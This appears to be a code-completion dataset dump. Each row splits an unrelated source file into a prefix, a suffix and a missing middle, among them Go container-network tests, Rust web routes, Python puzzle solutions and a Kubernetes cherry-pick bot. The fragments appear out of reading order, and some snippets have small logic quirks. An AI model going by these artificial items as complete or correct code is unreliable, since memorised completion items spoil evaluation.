tmp_item = convert(molecular_system, frame_indices=frame_indices, to_form='mdtraj.Trajectory')
sasa_array = shrake_rupley(tmp_item, mode='atom') # tiene probe_radius y n_sphere_points
if target=='atom':
if selection is not 'all':
atom_indices = select(molecular_system, selection=selection, syntaxis=syntaxis)
sasa_array = sasa_array[:,atom_indices]
else:
sets_atoms = get(molecular_system, target=target, selection=selection, syntaxis=syntaxis, atom_index=True)
n_sets = len(sets_atoms)
n_frames = sasa_array.shape[0]
new_sasa_array = np.empty([n_frames, n_sets], dtype='float')
for ii in range(n_sets):
new_sasa_array[:,ii] = sasa_array[:,sets_atoms[ii].astype(int)].sum(axis=1)
sasa_array = new_sasa_array
sasa_array = puw.quantity(sasa_array, 'nm**2')
sasa_array = puw.standardize(sasa_array)
else:
raise NotImplementedError("Engine not implemented yet")
return sasa_array
| get_sasa |
hns_test.go | package hcsshimtest
import (
"os"
"testing"
"github.com/microsoft/hcsshim"
)
const (
NatTestNetworkName string = "GoTestNat"
NatTestEndpointName string = "GoTestNatEndpoint"
)
func TestMain(m *testing.M) {
os.Exit(m.Run())
}
func CreateTestNetwork() (*hcsshim.HNSNetwork, error) {
network := &hcsshim.HNSNetwork{
Type: "NAT",
Name: NatTestNetworkName,
Subnets: []hcsshim.Subnet{
hcsshim.Subnet{
AddressPrefix: "192.168.100.0/24",
GatewayAddress: "192.168.100.1",
},
},
}
return network.Create()
}
func TestEndpoint(t *testing.T) {
network, err := CreateTestNetwork()
if err != nil {
t.Error(err)
}
Endpoint := &hcsshim.HNSEndpoint{
Name: NatTestEndpointName,
}
Endpoint, err = network.CreateEndpoint(Endpoint)
if err != nil {
t.Error(err)
}
err = Endpoint.HostAttach(1)
if err != nil {
t.Error(err)
}
err = Endpoint.HostDetach()
if err != nil {
t.Error(err)
}
_, err = Endpoint.Delete()
if err != nil {
t.Error(err)
}
_, err = network.Delete()
if err != nil {
t.Error(err)
}
}
func TestEndpointGetAll(t *testing.T) {
_, err := hcsshim.HNSListEndpointRequest()
if err != nil {
t.Error(err)
}
}
func TestNetworkGetAll(t *testing.T) {
_, err := hcsshim.HNSListNetworkRequest("GET", "", "")
if err != nil {
t.Error(err)
}
}
func | (t *testing.T) {
network, err := CreateTestNetwork()
if err != nil {
t.Error(err)
}
_, err = network.Delete()
if err != nil {
t.Error(err)
}
}
| TestNetwork |
99-blackJack.py | '''
BLACKJACK HIGHEST
Basic Blackjack rules:
1. Cards with the numbers 2 through 10 have their face value.
2. Jacks, queens, and kings are valued at 10 points.
3. Aces can be 1 or 11 points.
Have the function BlackjackHighest(strArr) take the strArr parameter being passed
which will be an array of numbers and letters representing blackjack cards.
Numbers in the array will be written out.
So for example strArr may be ["two","three","ace","king"].
The full list of possibilities for
strArr is: two, three, four, five, six, seven, eight, nine, ten, jack, queen, king, ace.
Your program should output below, above, or blackjack signifying if you have blackjack (numbers add up to 21) or not and the highest card in your hand in relation to whether or not you have blackjack.
If the array contains an ace but your hand will go above 21, you must count the ace as a 1.
You must always try and stay below the 21 mark.
So using the array mentioned above, the output should be below king.
The ace is counted as a 1 in this example because if it wasn't you would be above the 21 mark.
Another example would be if strArr was ["four","ten","king"], the output here should be above king.
If you have a tie between a ten and a face card in your hand, return the face card as the "highest card".
If you have multiple face cards, the order of importance is jack, queen, king.
Examples
Input: ["four","ace","ten"]
Output: below ten
Input: ["ace","queen"]
Output: blackjack ace
'''
def | (strArr):
cards_list = ['ace','two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'jack', 'queen', 'king']
cards_values = [11,2,3,4,5,6,7,8,9,10,10,10,10]
hand_values = []
highest_card_rank = 0
ace_in_deck = False
for card in strArr:
index_of_card = cards_list.index(card)
if card == 'ace':
ace_in_deck = True
if index_of_card > highest_card_rank:
highest_card_rank = index_of_card
hand_values.append(cards_values[cards_list.index(card)])
total_hand = sum(hand_values)
if ace_in_deck==True and total_hand == 21:
return 'blackjack'+' '+'ace'
elif ace_in_deck==False and total_hand == 21:
return 'blackjack'+' '+cards_list[highest_card_rank]
elif ace_in_deck==True and total_hand > 21:
total_hand-=10 #adjusting ace value to 1
if total_hand < 21:
return 'below'+' '+cards_list[highest_card_rank]
else:
return 'above'+' '+cards_list[highest_card_rank]
elif ace_in_deck==True and total_hand < 21:
return 'below'+' '+'ace'
elif ace_in_deck==False and total_hand > 21:
return 'above'+' '+cards_list[highest_card_rank]
elif ace_in_deck==False and total_hand < 21:
return 'below'+' '+cards_list[highest_card_rank]
else:
return 'Missed'
# keep this function call here
print(BlackjackHighest(["ten","seven","three"]))
#Input: ["ten","seven","three"]
#Ans. Below ten
| BlackjackHighest |
mod.rs | //!
pub mod simulation; | //!
//! Cortex System simulation |
|
data_interop.rs | /* artifact: the requirements tracking tool made for developers
* Copyright (C) 2018 Rett Berg <@vitiral, [email protected]>
*
* The source code is Licensed under either of
*
* * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or
* http://www.apache.org/licenses/LICENSE-2.0)
* * MIT license ([LICENSE-MIT](LICENSE-MIT) or
* http://opensource.org/licenses/MIT)
*
* at your option.
*
* Unless you explicitly state otherwise, any contribution intentionally submitted
* for inclusion in the work by you, as defined in the Apache-2.0 license, shall
* be dual licensed as above, without any additional terms or conditions.
* */
//! Interop Tests:
//! - #TST-read-artifact
#[macro_use]
extern crate expect_macro;
extern crate artifact_data;
extern crate artifact_lib;
extern crate artifact_test;
extern crate ergo;
use artifact_lib::*;
use artifact_test::{
assert_stuff_data, run_generic_interop_test, run_generic_interop_tests, INTEROP_TESTS_PATH,
};
use ergo::*;
/// This runs the interop tests for artifact-data.
fn run_interop_tests<P: AsRef<Path>>(test_base: P) {
run_generic_interop_tests(test_base, run_data_test);
}
fn run_data_test(project_path: PathDir) {
run_generic_interop_test(
project_path,
(),
read_project_shim,
modify_project_shim,
assert_stuff_data,
);
}
/// Simply calls `artifact_data::read_project(project_path)`
///
/// Used to satisfy the type requirements of `Fn` (cannot accept `AsRef`)
fn read_project_shim(
project_path: PathDir,
_state: (),
) -> Result<(lint::Categorized, Project), lint::Categorized> {
artifact_data::read_project(project_path)
}
/// Simply calls `artifact_data::modify_project(project_path, operations)`
///
/// Used to satisfy the type requirements of `Fn` (cannot accept `AsRef`)
fn | (
project_path: PathDir,
operations: Vec<ArtifactOp>,
_state: (),
) -> Result<(lint::Categorized, Project), ModifyError> {
// Do basic round-trip serialization
let result = expect!(round_ser!(Vec<ArtifactOp>, operations));
assert_eq!(operations, result);
// Do round trip through `*Ser` types
let operations_ser = expect!(round_ser!(Vec<ArtifactOpSer>, operations));
let result = expect!(round_ser!(Vec<ArtifactOp>, operations_ser));
artifact_data::modify_project(project_path, operations)
}
#[test]
/// #TST-read-artifact.empty
fn data_interop_project_empty() {
run_interop_tests(INTEROP_TESTS_PATH.join("empty"));
}
#[test]
/// #TST-read-artifact.source_only
fn data_interop_source_only() {
run_interop_tests(INTEROP_TESTS_PATH.join("source_only"));
}
#[test]
/// #TST-read-artifact.source_invalid
fn data_interop_source_invalid() {
run_interop_tests(INTEROP_TESTS_PATH.join("source_invalid"));
}
#[test]
/// #TST-read-artifact.design_only
fn data_interop_design_only() {
run_interop_tests(INTEROP_TESTS_PATH.join("design_only"));
}
#[test]
/// #TST-read-artifact.basic
fn data_interop_basic() {
run_interop_tests(INTEROP_TESTS_PATH.join("basic"));
}
#[test]
/// #TST-read-artifact.lints
fn data_interop_lints_error1() {
run_interop_tests(INTEROP_TESTS_PATH.join("lints"));
}
#[test]
fn data_interop_lints_error2() {
run_interop_tests(INTEROP_TESTS_PATH.join("lints2"));
}
| modify_project_shim |
target.py |
def digest_target(target):
| from .element import digest_element
return digest_element(target) |
|
dekorateur.py | def is_prime(n):
return all(n % i for i in range(2,n)) |
||
cm_shell_numpy.py | from __future__ import print_function
import os
from cmd3.console import Console
from cmd3.shell import command
from cloudmesh_numpy.command_numpy import command_numpy
class cm_shell_numpy:
def activate_cm_shell_numpy(self):
self.register_command_topic('mycommands', 'numpy')
@command
def | (self, args, arguments):
"""
::
Usage:
numpy NAME
tests via ping if the host ith the give NAME is reachable
Arguments:
NAME Name of the machine to test
Options:
-v verbose mode
"""
# pprint(arguments)
if arguments["NAME"] is None:
Console.error("Please specify a host name")
else:
host = arguments["NAME"]
Console.info("trying to reach {0}".format(host))
status = command_numpy.status(host)
if status:
Console.info("machine " + host + " has been found. ok.")
else:
Console.error("machine " + host + " not reachable. error.")
pass
if __name__ == '__main__':
command = cm_shell_numpy()
command.do_numpy("iu.edu")
command.do_numpy("iu.edu-wrong")
| do_numpy |
Opengauss_Function_System_Table_Case0033.py | """
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 系统表
Case Name : 测试系统表PG_FOREIGN_TABLE字段与数据类型
Description :
1.查看系统表PG_FOREIGN_TABLE的表结构
2.该表字段与对应字段数据类型是否正确
Expect :
1.查看系统表PG_FOREIGN_TABLE的表结构成功
2.该表字段与字段数据类型对应正确
History :
"""
import sys
import unittest
from yat.test import Node
from yat.test import macro
sys.path.append(sys.path[0] + "/../")
from testcase.utils.Logger import Logger
from testcase.utils.Common import Common
from testcase.utils.CommonSH import CommonSH
logger = Logger()
class IndexFileDamaged(unittest.TestCase):
def setUp(self):
logger.info('----------------this is setup-----------------------')
logger.info('--------------Opengauss_Function_System_Table_Case0033开始执行--------------')
self.userNode = Node('dbuser')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.com = Common()
self.comsh = CommonSH('dbuser')
self.expect_result_dict = {'Column': ['ftrelid', 'ftserver', 'ftwriteonly', 'ftoptions'],
'Type': ['oid', 'oid', 'boolean', 'text[]']}
def test_Index_file_damaged(self):
logger.info('----------------------------查看表结构-----------------------------')
msg = self.comsh. | REIGN_TABLE')
logger.info(msg)
result_dict = self.com.format_sql_result(msg)
logger.info(result_dict)
del result_dict['Modifiers']
self.assertDictEqual(self.expect_result_dict, result_dict)
def tearDown(self):
logger.info('----------------this is tearDown-----------------------')
# 无须清理环境
logger.info('-----------------------Opengauss_Function_System_Table_Case0033执行完成-----------------------------')
| execut_db_sql('\d PG_FO |
requiredFields.validation.ts | import MissingParamError from '../../../errors/MissingParamError'
import { Validator } from '../validator.protocol'
export class | implements Validator {
constructor (private readonly fieldName: string) {}
validate (input: any): Error | undefined {
if (!input[this.fieldName]) {
return new MissingParamError(this.fieldName)
}
}
}
| RequiredFieldsValidation |
mod.rs | use crate::api_service::Data;
use actix_web::{delete, get, post, web, HttpResponse, Responder};
#[get("/get-all")]
async fn get_all_json(app_data: web::Data<crate::AppState>) -> impl Responder {
let action = app_data.service_manager.api.get_json();
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
#[get("/get-by/{param}")]
async fn get_user_email(app_data: web::Data<crate::AppState>, param: web::Path<String>) -> impl Responder {
let action = app_data.service_manager.api.get_by(¶m);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
#[post("/add")]
async fn add_user(app_data: web::Data<crate::AppState>, data: web::Json<Data>) -> impl Responder |
#[post("/update/{param}")]
async fn update_user(app_data: web::Data<crate::AppState>, data: web::Json<Data>, param: web::Path<String>) -> impl Responder {
let action = app_data.service_manager.api.update(&data, ¶m);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result.modified_count),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
#[delete("/delete")]
async fn delete_user(app_data: web::Data<crate::AppState>, data: web::Json<Data>) -> impl Responder {
let action = app_data.service_manager.api.delete(&data.title);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result.deleted_count),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
// function that will be called on new Application to configure routes for this module
pub fn init(cfg: &mut web::ServiceConfig) {
cfg.service(get_user_email);
cfg.service(add_user);
cfg.service(update_user);
cfg.service(delete_user);
cfg.service(get_all_json);
}
| {
let action = app_data.service_manager.api.create(&data);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result.inserted_id),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
} |
random_table.rs | use rltk::RandomNumberGenerator;
pub struct RandomEntry {
name: String,
weight: i32,
}
| RandomEntry {
name: name.to_string(),
weight,
}
}
}
#[derive(Default)]
pub struct RandomTable {
entries: Vec<RandomEntry>,
total_weight: i32,
}
impl RandomTable {
pub fn new() -> RandomTable {
RandomTable {
entries: Vec::new(),
total_weight: 0,
}
}
pub fn add<S: ToString>(mut self, name: S, weight: i32) -> RandomTable {
if weight > 0 {
self.total_weight += weight;
self.entries
.push(RandomEntry::new(name.to_string(), weight));
}
return self;
}
pub fn roll(&self, rng: &mut RandomNumberGenerator) -> String {
if self.total_weight == 0 {
return "None".to_string();
}
let mut roll = rng.roll_dice(1, self.total_weight) - 1;
let mut index: usize = 0;
// "If the roll is below the weight, it returns it - otherwise, it
// reduces the roll by the weight and tests the next entry.
// This gives a chance equal to the relative weight of the
// entry for any given item in the table."
while roll > 0 {
if roll < self.entries[index].weight {
return self.entries[index].name.clone();
}
roll -= self.entries[index].weight;
index += 1;
}
"None".to_string()
}
} | impl RandomEntry {
pub fn new<S: ToString>(name: S, weight: i32) -> RandomEntry { |
day01.py | def open_input():
with open("input.txt") as fd:
array = fd.read().splitlines()
array = list(map(int, array))
return array
| lenght = len(array)
increased = 0
for i in range(0, lenght - 1):
if array[i] < array[i + 1]:
increased += 1
print("part one:", increased)
def part_two(array):
lenght = len(array)
increased = 0
for i in range(0, lenght - 3):
sum1 = array[i] + array[i + 1] + array[i + 2]
sum2 = array[i + 1] + array[i + 2] + array[i + 3]
if sum1 < sum2:
increased += 1
print("part two:", increased)
if (__name__ == "__main__"):
array = open_input()
part_one(array)
part_two(array) |
def part_one(array): |
mod.rs | // Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
pub mod analysis;
pub mod config; | pub mod heartbeat;
pub mod merge;
pub mod report;
pub mod stats;
pub mod utils; | pub mod coverage;
pub mod fuzz;
pub mod generic; |
cherrypick-clear-after-merge.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package mungers
import (
"fmt"
"strings"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/test-infra/mungegithub/features"
"k8s.io/test-infra/mungegithub/github"
"k8s.io/test-infra/mungegithub/options"
"github.com/golang/glog"
)
const (
clearAfterMergeName = "cherrypick-clear-after-merge"
)
type LogFinder interface {
FoundLog(branch, logString string, regexSearch bool) (bool, string)
}
// ClearPickAfterMerge will remove the the cherrypick-candidate label from
// any PR that does not have a 'release' milestone set.
type ClearPickAfterMerge struct {
features *features.Features
logs LogFinder
}
func init() {
RegisterMungerOrDie(&ClearPickAfterMerge{})
}
// Name is the name usable in --pr-mungers
func (c *ClearPickAfterMerge) Name() string { return clearAfterMergeName }
// RequiredFeatures is a slice of 'features' that must be provided
func (c *ClearPickAfterMerge) RequiredFeatures() []string { return []string{features.RepoFeatureName} }
// Initialize will initialize the munger
func (c *ClearPickAfterMerge) Initialize(config *github.Config, features *features.Features) error {
c.features = features
c.logs = c
return nil
}
// EachLoop is called at the start of every munge loop
func (c *ClearPickAfterMerge) EachLoop() error { return nil }
// RegisterOptions registers options for this munger; returns any that require a restart when changed.
func (c *ClearPickAfterMerge) RegisterOptions(opts *options.Options) sets.String { return nil }
func handleFound(obj *github.MungeObject, branch string) error {
msg := fmt.Sprintf("Commit found in the %q branch appears to be this PR. Removing the %q label. If this is an error find help to get your PR picked.", branch, cpCandidateLabel)
obj.WriteComment(msg)
obj.RemoveLabel(cpCandidateLabel)
return nil
}
// FoundLog will return if the given `logString` exists on the branch in question.
// it will also return the actual logs for further processing
func (c *ClearPickAfterMerge) FoundLog(branch, logString string, regexSearch bool) (bool, string) {
args := []string{"merge-base", "origin/master", "origin/" + branch}
out, err := c.features.Repos.GitCommand(args)
base := string(out)
if err != nil {
glog.Errorf("Unable to find the fork point for branch %s. %s:%v", branch, base, err)
return false, ""
}
lines := strings.Split(base, "\n")
if len(lines) < 1 {
glog.Errorf("Found 0 lines splitting the results of git merge-base")
}
base = lines[0]
// if release-1.2 branched from master at abcdef123 this should result in:
// abcdef123..origin/release-1.2
logRefs := fmt.Sprintf("%s..origin/%s", base, branch)
var regexFlag string
if regexSearch {
regexFlag = "-E"
} else {
regexFlag = "-F"
}
args = []string{"log", "--pretty=tformat:%H%n%s%n%b", regexFlag, "--grep", logString, logRefs}
out, err = c.features.Repos.GitCommand(args)
logs := string(out)
if err != nil {
glog.Errorf("Error grepping logs out=%q: %v", logs, err)
return false, ""
}
glog.V(10).Infof("args:%v", args)
return true, logs
}
// Can we find a commit in the changelog that looks like it was done using git cherry-pick -m1 -x ?
func (c *ClearPickAfterMerge) foundByPickDashX(obj *github.MungeObject, branch string) bool {
sha, ok := obj.MergeCommit()
if !ok {
return false
}
if sha == nil {
glog.Errorf("Unable to get SHA of merged PR %d", *obj.Issue.Number)
return false
}
cherrypickMsg := fmt.Sprintf("(cherry picked from commit %s)", *sha)
found, logs := c.logs.FoundLog(branch, cherrypickMsg, false)
if !found {
return false
}
// double check for the 'non -x' message
logMsg := fmt.Sprintf("Merge pull request #%d from ", *obj.Issue.Number)
if !strings.Contains(logs, logMsg) {
return false | glog.Infof("Found cherry-pick for %d using -x information in branch %q", *obj.Issue.Number, branch)
return true
}
// Can we find a commit in the changelog that looks like it was done using git cherry-pick -m1 ?
func (c *ClearPickAfterMerge) foundByPickWithoutDashX(obj *github.MungeObject, branch string) bool {
logMsg := fmt.Sprintf("Merge pull request #%d from ", *obj.Issue.Number)
found, _ := c.logs.FoundLog(branch, logMsg, false)
if found {
glog.Infof("Found cherry-pick for %d using log matching for `git cherry-pick` in branch %q", *obj.Issue.Number, branch)
}
return found
}
// Check that the commit messages for all commits in the PR are on the branch
func (c *ClearPickAfterMerge) foundByAllCommits(obj *github.MungeObject, branch string) bool {
commits, ok := obj.GetCommits()
if !ok {
glog.Infof("unable to get commits")
return false
}
for _, commit := range commits {
if commit.Commit == nil {
return false
}
if commit.Commit.Message == nil {
return false
}
found, _ := c.logs.FoundLog(branch, *commit.Commit.Message, false)
if !found {
return false
}
}
return true
}
// Can we find a commit in the changelog that looks like it was done using the hack/cherry_pick_pull.sh script ?
func (c *ClearPickAfterMerge) foundByScript(obj *github.MungeObject, branch string) bool {
logMsg := fmt.Sprintf(`^Automated cherry pick of( #[0-9]+)* #%d( #[0-9]+)*$`, *obj.Issue.Number)
found, _ := c.logs.FoundLog(branch, logMsg, true)
if found {
glog.Infof("Found cherry-pick for %d using log matching for `hack/cherry_pick_pull.sh` in branch %q", *obj.Issue.Number, branch)
}
return found
}
// Munge is the workhorse the will actually make updates to the PR
func (c *ClearPickAfterMerge) Munge(obj *github.MungeObject) {
if !obj.IsPR() {
return
}
if !obj.HasLabel(cpCandidateLabel) {
return
}
if merged, ok := obj.IsMerged(); !ok || !merged {
return
}
releaseMilestone, ok := obj.ReleaseMilestone()
if !ok || releaseMilestone == "" || len(releaseMilestone) != 4 {
glog.Errorf("Found invalid milestone: %q", releaseMilestone)
return
}
rel := releaseMilestone[1:]
branch := "release-" + rel
if c.foundByPickDashX(obj, branch) {
handleFound(obj, branch)
return
}
if c.foundByAllCommits(obj, branch) {
handleFound(obj, branch)
return
}
if c.foundByPickWithoutDashX(obj, branch) {
handleFound(obj, branch)
return
}
if c.foundByScript(obj, branch) {
handleFound(obj, branch)
return
}
return
} | } |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.